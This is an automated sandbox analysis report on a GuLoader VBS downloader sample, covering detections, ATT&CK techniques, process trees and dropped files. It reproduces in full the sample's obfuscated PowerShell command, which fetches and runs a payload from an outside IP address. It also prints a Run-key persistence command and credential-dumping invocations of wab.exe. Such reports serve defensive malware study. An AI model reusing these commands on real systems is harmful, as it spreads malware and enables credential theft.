guloader | 64acc721ccd028a8ddbef16799ddd074376bdf9358d16e1b33d91af4062ad581

Analysis

max time kernel
149s
max time network
136s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
30-06-2024 01:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

64acc721ccd028a8ddbef16799ddd074376bdf9358d16e1b33d91af4062ad581.vbs
Size

187KB
MD5

a658224accc9bc72909b9fecb935d185
SHA1

dcc72836dac07a5fdcf7b200d672939d4c5ac682
SHA256

64acc721ccd028a8ddbef16799ddd074376bdf9358d16e1b33d91af4062ad581
SHA512

1ee3cac91f3d44b29de172e3a3825b3d228f3f7a9f5259b0c2aca3959e4c07f4347d6b2e5aecf2c15fe47a4ff6ea474ed854ffd8683a7099f0d0ad18ee04de22
SSDEEP

3072:bmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZV:b08GxbKja3+DCbKCvBB/WnHXC/sLJFJC

Score

10^/10

guloader collection downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Detects executables built or packed with MPress PE compressor 12 IoCs

Processes:

resource	yara_rule
behavioral2/memory/464-53-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/4344-57-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3344-59-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/464-58-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/4344-56-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/464-55-0x0000000000400000-0x0000000000478000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/4344-54-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3344-63-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/3344-65-0x0000000000400000-0x0000000000424000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/2740-68-0x0000000020AF0000-0x0000000020B09000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/2740-72-0x0000000020AF0000-0x0000000020B09000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral2/memory/2740-71-0x0000000020AF0000-0x0000000020B09000-memory.dmp	INDICATOR_EXE_Packed_MPress

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 1 IoCs

Processes:

resource yara_rule

behavioral2/memory/4344-57-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
Detects executables referencing many email and collaboration clients. Observed in information stealers 1 IoCs

Processes:

resource yara_rule

behavioral2/memory/4344-57-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients

Processes:

resource yara_rule

behavioral2/memory/4344-57-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers

Processes:

resource yara_rule

behavioral2/memory/464-58-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView

resource	yara_rule
behavioral2/memory/4344-57-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store

resource	yara_rule
behavioral2/memory/4344-57-0x0000000000400000-0x0000000000462000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients

resource	yara_rule
behavioral2/memory/4344-57-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

resource	yara_rule
behavioral2/memory/464-58-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4344-57-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/464-58-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/3344-65-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

Blocklisted process makes network request 2 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

2 2980 WScript.exe
7 3484 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
collection

Email Collection
T1114

Processes:

wab.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe

flow	pid	process
2	2980	WScript.exe
7	3484	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hierochloe = "%Kontorvikarens% -w 1 $Jurisdiktionskompetancerne=(Get-ItemProperty -Path 'HKCU:\\Spandt\\').Mobilizables;%Kontorvikarens% ($Jurisdiktionskompetancerne)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

2740 wab.exe
2740 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

3788 powershell.exe
2740 wab.exe

pid	process
2740	wab.exe
2740	wab.exe

pid	process
3788	powershell.exe
2740	wab.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exewab.exe

description	pid	process	target process
PID 3788 set thread context of 2740	3788	powershell.exe	wab.exe
PID 2740 set thread context of 464	2740	wab.exe	wab.exe
PID 2740 set thread context of 4344	2740	wab.exe	wab.exe
PID 2740 set thread context of 3344	2740	wab.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4736 reg.exe
Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exewab.exewab.exe

pid process

3484 powershell.exe
3484 powershell.exe
3788 powershell.exe
3788 powershell.exe
3788 powershell.exe
464 wab.exe
464 wab.exe
3344 wab.exe
3344 wab.exe
464 wab.exe
464 wab.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exewab.exe

pid process

3788 powershell.exe
2740 wab.exe
2740 wab.exe
2740 wab.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 3484 powershell.exe
Token: SeDebugPrivilege 3788 powershell.exe
Token: SeDebugPrivilege 3344 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

2740 wab.exe

pid	process
4736	reg.exe

pid	process
3484	powershell.exe
3484	powershell.exe
3788	powershell.exe
3788	powershell.exe
3788	powershell.exe
464	wab.exe
464	wab.exe
3344	wab.exe
3344	wab.exe
464	wab.exe
464	wab.exe

pid	process
3788	powershell.exe
2740	wab.exe
2740	wab.exe
2740	wab.exe

description	pid	process
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeDebugPrivilege	3788	powershell.exe
Token: SeDebugPrivilege	3344	wab.exe

pid	process
2740	wab.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 2980 wrote to memory of 3484	2980	WScript.exe	powershell.exe
PID 2980 wrote to memory of 3484	2980	WScript.exe	powershell.exe
PID 3484 wrote to memory of 4580	3484	powershell.exe	cmd.exe
PID 3484 wrote to memory of 4580	3484	powershell.exe	cmd.exe
PID 3484 wrote to memory of 3788	3484	powershell.exe	powershell.exe
PID 3484 wrote to memory of 3788	3484	powershell.exe	powershell.exe
PID 3484 wrote to memory of 3788	3484	powershell.exe	powershell.exe
PID 3788 wrote to memory of 3960	3788	powershell.exe	cmd.exe
PID 3788 wrote to memory of 3960	3788	powershell.exe	cmd.exe
PID 3788 wrote to memory of 3960	3788	powershell.exe	cmd.exe
PID 3788 wrote to memory of 2740	3788	powershell.exe	wab.exe
PID 3788 wrote to memory of 2740	3788	powershell.exe	wab.exe
PID 3788 wrote to memory of 2740	3788	powershell.exe	wab.exe
PID 3788 wrote to memory of 2740	3788	powershell.exe	wab.exe
PID 3788 wrote to memory of 2740	3788	powershell.exe	wab.exe
PID 2740 wrote to memory of 3996	2740	wab.exe	cmd.exe
PID 2740 wrote to memory of 3996	2740	wab.exe	cmd.exe
PID 2740 wrote to memory of 3996	2740	wab.exe	cmd.exe
PID 3996 wrote to memory of 4736	3996	cmd.exe	reg.exe
PID 3996 wrote to memory of 4736	3996	cmd.exe	reg.exe
PID 3996 wrote to memory of 4736	3996	cmd.exe	reg.exe
PID 2740 wrote to memory of 464	2740	wab.exe	wab.exe
PID 2740 wrote to memory of 464	2740	wab.exe	wab.exe
PID 2740 wrote to memory of 464	2740	wab.exe	wab.exe
PID 2740 wrote to memory of 464	2740	wab.exe	wab.exe
PID 2740 wrote to memory of 4344	2740	wab.exe	wab.exe
PID 2740 wrote to memory of 4344	2740	wab.exe	wab.exe
PID 2740 wrote to memory of 4344	2740	wab.exe	wab.exe
PID 2740 wrote to memory of 4344	2740	wab.exe	wab.exe
PID 2740 wrote to memory of 3344	2740	wab.exe	wab.exe
PID 2740 wrote to memory of 3344	2740	wab.exe	wab.exe
PID 2740 wrote to memory of 3344	2740	wab.exe	wab.exe
PID 2740 wrote to memory of 3344	2740	wab.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\64acc721ccd028a8ddbef16799ddd074376bdf9358d16e1b33d91af4062ad581.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Orchic81 Chippene Weanable Forlystelsesstedet215 Introduct Acutilinguae Prename229 Gaines Fagbibliotekets Antihistamin Forgrundsfarver Evalinas188 Menialness lufttrafikvej Karrierers Disposability Toggles Schoolish136 Optrinet Brechtian Ekviperingerne Behoevede Tronbestigelserne Reprokopisters Orchic81 Chippene Weanable Forlystelsesstedet215 Introduct Acutilinguae Prename229 Gaines Fagbibliotekets Antihistamin Forgrundsfarver Evalinas188 Menialness lufttrafikvej Karrierers Disposability Toggles Schoolish136 Optrinet Brechtian Ekviperingerne Behoevede Tronbestigelserne Reprokopisters';If (${host}.CurrentCulture) {$Vkstpolitik149++;}Function Undercarrying126($Runtm){$Straffesparksfeltet=$Runtm.Length-$Vkstpolitik149;$Absorptivity100='SUBsTRI';$Absorptivity100+='ng';For( $Thionins=1;$Thionins -lt $Straffesparksfeltet;$Thionins+=2){$Orchic81+=$Runtm.$Absorptivity100.Invoke( $Thionins, $Vkstpolitik149);}$Orchic81;}function Gallanted($Beechwoods){ & ($Nonplastic) ($Beechwoods);}$Gitres=Undercarrying126 'hMSo,zhiRl l a / 5M.s0 ( W,i nMd.oUw sI TNRTN C1m0 . 0I;T .WIiKnC6B4R;T x 6 4 ;, irbvU:W1 2.1 . 0T), BGHeJc,k o /E2,0B1.0H0 1L0.1 .F i,rHe.fSo x,/ 1A2D1B. 0 ';$Raceme=Undercarrying126 'UUDs,eGr -UA.g e,nUtB ';$Introduct=Undercarrying126 'Fh t t.p,:A/Z/A1 0,3.. 1,9M5t.f2O3U7M. 4,3K/PFNiPn a.n s,lSo.v eusu2S0 3 .HmLi x ';$Kopierpapirets=Undercarrying126 'i>, ';$Nonplastic=Undercarrying126 ' iSeAx, ';$Flamboyancy='Gaines';$Synodsman = Undercarrying126 'Se.c hSo ,%Ca pdp d.a t,a %,\ZJ.iSnBg.o,i sWt i.c,8,2.. KAo.b A&S&S PeScChFoK t. ';Gallanted (Undercarrying126 ' $Cg lsoPbta l,:HSCuSr,pglUi c e.s = ( cSmLdW / cF $,S yfn,o dSsFm a nv)L ');Gallanted (Undercarrying126 ' $CgSlDo.b a lF:RF o,rElCy s t.e l s e,sKsRt eRd eNtS2.1,5 =A$SI,n,tLrKo.d uAcDt,.,sUp lSi.tG(u$UKAoOpBimeMrMp,a pHi.r e t sC) ');Gallanted (Undercarrying126 '.[MN,e t . S e rPvMi,cIe P.o i nEt MnaDn.a g e r ] :,: S e c,uCr i tHySP r.o,t oRc,o lT =T A[ NDeTt . SBe,c uBrKi tGyCP r oFt oMc,o.lKT y.pBe ] :U:,T l sK1J2 ');$Introduct=$Forlystelsesstedet215[0];$Tandrodsbetndelsernes= (Undercarrying126 'K$BgHlPoHbMa lD:,N o n e.faf uSsFi,vSe n,e,sfs.=NN eVw -OODbijLe cDtT ASuy.s t.e,m .,Nke,t ..W eBb C lDi.eGn t');$Tandrodsbetndelsernes+=$Surplices[1];Gallanted ($Tandrodsbetndelsernes);Gallanted (Undercarrying126 ',$.N.oPn.e,f f uSs iDv e,nCePs.s...HTe aUdLe r sS[,$ R aHc,e mle ]R=D$ G i t r e,sH ');$Homeothermism=Undercarrying126 'V$ANQo nbeWfKf u,sOiJv,eSnIeDsGs .TD,oNw n.l o aRdCFUi l e ( $IIPn tFrRond u.c,tS,J$MBBeKhSoBe,v.eSd.e ). ';$Behoevede=$Surplices[0];Gallanted (Undercarrying126 'T$Ag lLo bLaFlY: B.i o,fba,g eDt sP=,(FTpeFs t,-SPTa t h, p$ B.eph,o,eUvSe dmeS). ');while (!$Biofagets) {Gallanted (Undercarrying126 ',$,g.l.oKbCaSl : JPo rFdEbJrPr eInSeU= $PtVrSuPe ') ;Gallanted $Homeothermism;Gallanted (Undercarrying126 ',S t a rCtC-TSSl e.e pP I4 ');Gallanted (Undercarrying126 '.$ gAl oLb a lF: B,iPo f.a gYeCt,sD=F(FT,eSsNt.-TPSa tDh, S$BB e.h o e v,eOd e )S ') ;Gallanted (Undercarrying126 ' $ g l o,bAa,l.: WDe a n a b loe,= $Fg.lEombFaUl,:PCDhFiPpBpCe nRe,+E+P%R$CFSoIrIl y sPt e l sOeFsUs,t eAd evt 2a1m5..HcMo.u n tT ') ;$Introduct=$Forlystelsesstedet215[$Weanable];}$Devalueringer=356930;$Tomblike=24818;Gallanted (Undercarrying126 'T$MgFl ogb.a,lF:AF,a.gCbNi.b l,iMo tPeAk.e t.sN P= HG e tD-SC o nTtUe nBtB $ B e h.oVeSvRe dCe. ');Gallanted (Undercarrying126 'T$AgBl.oFbLaDl,:KBBi tsnFiRv e atu,s. =. P[bS,yRs.tIe m .HC.oOn vHeSr.t ] :O: F r,oCm BAaAsKe 6,4TS,t rPi n.g,(R$cFAaLg.b,ihbSl iEoUtSeEk e tSs )B ');Gallanted (Undercarrying126 ' $NgFl,o b.a lu:TE v.a.lSi n aJs 1F8 8 =F J[NSPy sUtRe,mS. TBeUx tC.AETn cto dFiRnsgo]E:f:aA,SUC IPIS.IGAe.t SEtSr iBnPgB( $FBoi tCn i vSe aSu sK)P ');Gallanted (Undercarrying126 'L$TgElUoCb aSlE:GUEiTg,e.nKn eFmTt.rRnOgFeAlPi,g,hLe dDeDnA= $VEgv a,lMi n.a s,1 8 8M. s uTb sPtFr.i,n.g (P$FDKeKv.a lSuGe,r i nDgpeBr ,I$OTBo,m,b,lUinkeeL). ');Gallanted $Uigennemtrngeligheden;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3484

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jingoistic82.Kob && echo t"
3⤵
PID:4580

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Orchic81 Chippene Weanable Forlystelsesstedet215 Introduct Acutilinguae Prename229 Gaines Fagbibliotekets Antihistamin Forgrundsfarver Evalinas188 Menialness lufttrafikvej Karrierers Disposability Toggles Schoolish136 Optrinet Brechtian Ekviperingerne Behoevede Tronbestigelserne Reprokopisters Orchic81 Chippene Weanable Forlystelsesstedet215 Introduct Acutilinguae Prename229 Gaines Fagbibliotekets Antihistamin Forgrundsfarver Evalinas188 Menialness lufttrafikvej Karrierers Disposability Toggles Schoolish136 Optrinet Brechtian Ekviperingerne Behoevede Tronbestigelserne Reprokopisters';If (${host}.CurrentCulture) {$Vkstpolitik149++;}Function Undercarrying126($Runtm){$Straffesparksfeltet=$Runtm.Length-$Vkstpolitik149;$Absorptivity100='SUBsTRI';$Absorptivity100+='ng';For( $Thionins=1;$Thionins -lt $Straffesparksfeltet;$Thionins+=2){$Orchic81+=$Runtm.$Absorptivity100.Invoke( $Thionins, $Vkstpolitik149);}$Orchic81;}function Gallanted($Beechwoods){ & ($Nonplastic) ($Beechwoods);}$Gitres=Undercarrying126 'hMSo,zhiRl l a / 5M.s0 ( W,i nMd.oUw sI TNRTN C1m0 . 0I;T .WIiKnC6B4R;T x 6 4 ;, irbvU:W1 2.1 . 0T), BGHeJc,k o /E2,0B1.0H0 1L0.1 .F i,rHe.fSo x,/ 1A2D1B. 0 ';$Raceme=Undercarrying126 'UUDs,eGr -UA.g e,nUtB ';$Introduct=Undercarrying126 'Fh t t.p,:A/Z/A1 0,3.. 1,9M5t.f2O3U7M. 4,3K/PFNiPn a.n s,lSo.v eusu2S0 3 .HmLi x ';$Kopierpapirets=Undercarrying126 'i>, ';$Nonplastic=Undercarrying126 ' iSeAx, ';$Flamboyancy='Gaines';$Synodsman = Undercarrying126 'Se.c hSo ,%Ca pdp d.a t,a %,\ZJ.iSnBg.o,i sWt i.c,8,2.. KAo.b A&S&S PeScChFoK t. ';Gallanted (Undercarrying126 ' $Cg lsoPbta l,:HSCuSr,pglUi c e.s = ( cSmLdW / cF $,S yfn,o dSsFm a nv)L ');Gallanted (Undercarrying126 ' $CgSlDo.b a lF:RF o,rElCy s t.e l s e,sKsRt eRd eNtS2.1,5 =A$SI,n,tLrKo.d uAcDt,.,sUp lSi.tG(u$UKAoOpBimeMrMp,a pHi.r e t sC) ');Gallanted (Undercarrying126 '.[MN,e t . S e rPvMi,cIe P.o i nEt MnaDn.a g e r ] :,: S e c,uCr i tHySP r.o,t oRc,o lT =T A[ NDeTt . SBe,c uBrKi tGyCP r oFt oMc,o.lKT y.pBe ] :U:,T l sK1J2 ');$Introduct=$Forlystelsesstedet215[0];$Tandrodsbetndelsernes= (Undercarrying126 'K$BgHlPoHbMa lD:,N o n e.faf uSsFi,vSe n,e,sfs.=NN eVw -OODbijLe cDtT ASuy.s t.e,m .,Nke,t ..W eBb C lDi.eGn t');$Tandrodsbetndelsernes+=$Surplices[1];Gallanted ($Tandrodsbetndelsernes);Gallanted (Undercarrying126 ',$.N.oPn.e,f f uSs iDv e,nCePs.s...HTe aUdLe r sS[,$ R aHc,e mle ]R=D$ G i t r e,sH ');$Homeothermism=Undercarrying126 'V$ANQo nbeWfKf u,sOiJv,eSnIeDsGs .TD,oNw n.l o aRdCFUi l e ( $IIPn tFrRond u.c,tS,J$MBBeKhSoBe,v.eSd.e ). ';$Behoevede=$Surplices[0];Gallanted (Undercarrying126 'T$Ag lLo bLaFlY: B.i o,fba,g eDt sP=,(FTpeFs t,-SPTa t h, p$ B.eph,o,eUvSe dmeS). ');while (!$Biofagets) {Gallanted (Undercarrying126 ',$,g.l.oKbCaSl : JPo rFdEbJrPr eInSeU= $PtVrSuPe ') ;Gallanted $Homeothermism;Gallanted (Undercarrying126 ',S t a rCtC-TSSl e.e pP I4 ');Gallanted (Undercarrying126 '.$ gAl oLb a lF: B,iPo f.a gYeCt,sD=F(FT,eSsNt.-TPSa tDh, S$BB e.h o e v,eOd e )S ') ;Gallanted (Undercarrying126 ' $ g l o,bAa,l.: WDe a n a b loe,= $Fg.lEombFaUl,:PCDhFiPpBpCe nRe,+E+P%R$CFSoIrIl y sPt e l sOeFsUs,t eAd evt 2a1m5..HcMo.u n tT ') ;$Introduct=$Forlystelsesstedet215[$Weanable];}$Devalueringer=356930;$Tomblike=24818;Gallanted (Undercarrying126 'T$MgFl ogb.a,lF:AF,a.gCbNi.b l,iMo tPeAk.e t.sN P= HG e tD-SC o nTtUe nBtB $ B e h.oVeSvRe dCe. ');Gallanted (Undercarrying126 'T$AgBl.oFbLaDl,:KBBi tsnFiRv e atu,s. =. P[bS,yRs.tIe m .HC.oOn vHeSr.t ] :O: F r,oCm BAaAsKe 6,4TS,t rPi n.g,(R$cFAaLg.b,ihbSl iEoUtSeEk e tSs )B ');Gallanted (Undercarrying126 ' $NgFl,o b.a lu:TE v.a.lSi n aJs 1F8 8 =F J[NSPy sUtRe,mS. TBeUx tC.AETn cto dFiRnsgo]E:f:aA,SUC IPIS.IGAe.t SEtSr iBnPgB( $FBoi tCn i vSe aSu sK)P ');Gallanted (Undercarrying126 'L$TgElUoCb aSlE:GUEiTg,e.nKn eFmTt.rRnOgFeAlPi,g,hLe dDeDnA= $VEgv a,lMi n.a s,1 8 8M. s uTb sPtFr.i,n.g (P$FDKeKv.a lSuGe,r i nDgpeBr ,I$OTBo,m,b,lUinkeeL). ');Gallanted $Uigennemtrngeligheden;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jingoistic82.Kob && echo t"
4⤵
PID:3960

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hierochloe" /t REG_EXPAND_SZ /d "%Kontorvikarens% -w 1 $Jurisdiktionskompetancerne=(Get-ItemProperty -Path 'HKCU:\Spandt\').Mobilizables;%Kontorvikarens% ($Jurisdiktionskompetancerne)"
5⤵
- Suspicious use of WriteProcessMemory
PID:3996

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hierochloe" /t REG_EXPAND_SZ /d "%Kontorvikarens% -w 1 $Jurisdiktionskompetancerne=(Get-ItemProperty -Path 'HKCU:\Spandt\').Mobilizables;%Kontorvikarens% ($Jurisdiktionskompetancerne)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:4736

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xmpcwtc"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:464

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\agcvxlvith"
5⤵
- Accesses Microsoft Outlook accounts
PID:4344

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\kihfxefjhpquy"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3344

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jan10vyo.1ib.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xmpcwtc
Filesize
4KB

MD5
73ddf6cd83c2ad8a2fbb2383e322ffbc

SHA1
05270f8bb7b5cc6ab9a61ae7453d047379089147

SHA256
0ef9194c6e90b23c416316fc5a15f549ee5b2472014fcd7648d72ca9a865b409

SHA512
714db1956faa795005b15324b9604105881d6b484fe899876fe0df85783c61a72f556a875833af8625625212503b95eea2eb353a1d98f6a7af47a3658ea5262d

Download Submit
C:\Users\Admin\AppData\Roaming\Jingoistic82.Kob
Filesize
497KB

MD5
78dab822fd4044d5a7f38064fe24d552

SHA1
44f35b5af779432f914b4d0c761bee819f5259d7

SHA256
2e4dd790bc8dd47cbcb7d7f6c40ce3e9970ded5b5f8af47b8be13af7c11c5c05

SHA512
a9d2366077a72d89edf689cbaf6d4ae1d4e41a691ae77e02a36cede81fdc29df8bd4daecd7976d12bc23694ee2a81f4e08b35586177b7df23db263113fda0b57

Download Submit
memory/464-53-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/464-58-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/464-55-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2740-68-0x0000000020AF0000-0x0000000020B09000-memory.dmp

Filesize
100KB

Download
memory/2740-72-0x0000000020AF0000-0x0000000020B09000-memory.dmp

Filesize
100KB

Download
memory/2740-71-0x0000000020AF0000-0x0000000020B09000-memory.dmp

Filesize
100KB

Download
memory/2740-48-0x0000000001FE0000-0x0000000004DF6000-memory.dmp

Filesize
46.1MB

Download
memory/3344-65-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3344-63-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3344-59-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3484-18-0x00007FFF9E760000-0x00007FFF9F221000-memory.dmp

Filesize
10.8MB

Download
memory/3484-16-0x00007FFF9E760000-0x00007FFF9F221000-memory.dmp

Filesize
10.8MB

Download
memory/3484-15-0x00007FFF9E760000-0x00007FFF9F221000-memory.dmp

Filesize
10.8MB

Download
memory/3484-5-0x0000029941CE0000-0x0000029941D02000-memory.dmp

Filesize
136KB

Download
memory/3484-51-0x00007FFF9E760000-0x00007FFF9F221000-memory.dmp

Filesize
10.8MB

Download
memory/3484-4-0x00007FFF9E763000-0x00007FFF9E765000-memory.dmp

Filesize
8KB

Download
memory/3788-41-0x00000000088B0000-0x0000000008E54000-memory.dmp

Filesize
5.6MB

Download
memory/3788-23-0x0000000005D30000-0x0000000005D96000-memory.dmp

Filesize
408KB

Download
memory/3788-40-0x0000000007660000-0x0000000007682000-memory.dmp

Filesize
136KB

Download
memory/3788-39-0x00000000076D0000-0x0000000007766000-memory.dmp

Filesize
600KB

Download
memory/3788-38-0x0000000006960000-0x000000000697A000-memory.dmp

Filesize
104KB

Download
memory/3788-20-0x0000000004E30000-0x0000000004E66000-memory.dmp

Filesize
216KB

Download
memory/3788-37-0x0000000007C80000-0x00000000082FA000-memory.dmp

Filesize
6.5MB

Download
memory/3788-36-0x0000000006440000-0x000000000648C000-memory.dmp

Filesize
304KB

Download
memory/3788-21-0x0000000005530000-0x0000000005B58000-memory.dmp

Filesize
6.2MB

Download
memory/3788-35-0x0000000006400000-0x000000000641E000-memory.dmp

Filesize
120KB

Download
memory/3788-22-0x0000000005B90000-0x0000000005BB2000-memory.dmp

Filesize
136KB

Download
memory/3788-34-0x0000000005E80000-0x00000000061D4000-memory.dmp

Filesize
3.3MB

Download
memory/3788-24-0x0000000005E10000-0x0000000005E76000-memory.dmp

Filesize
408KB

Download
memory/3788-43-0x0000000008E60000-0x000000000BC76000-memory.dmp

Filesize
46.1MB

Download
memory/4344-54-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4344-56-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4344-57-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download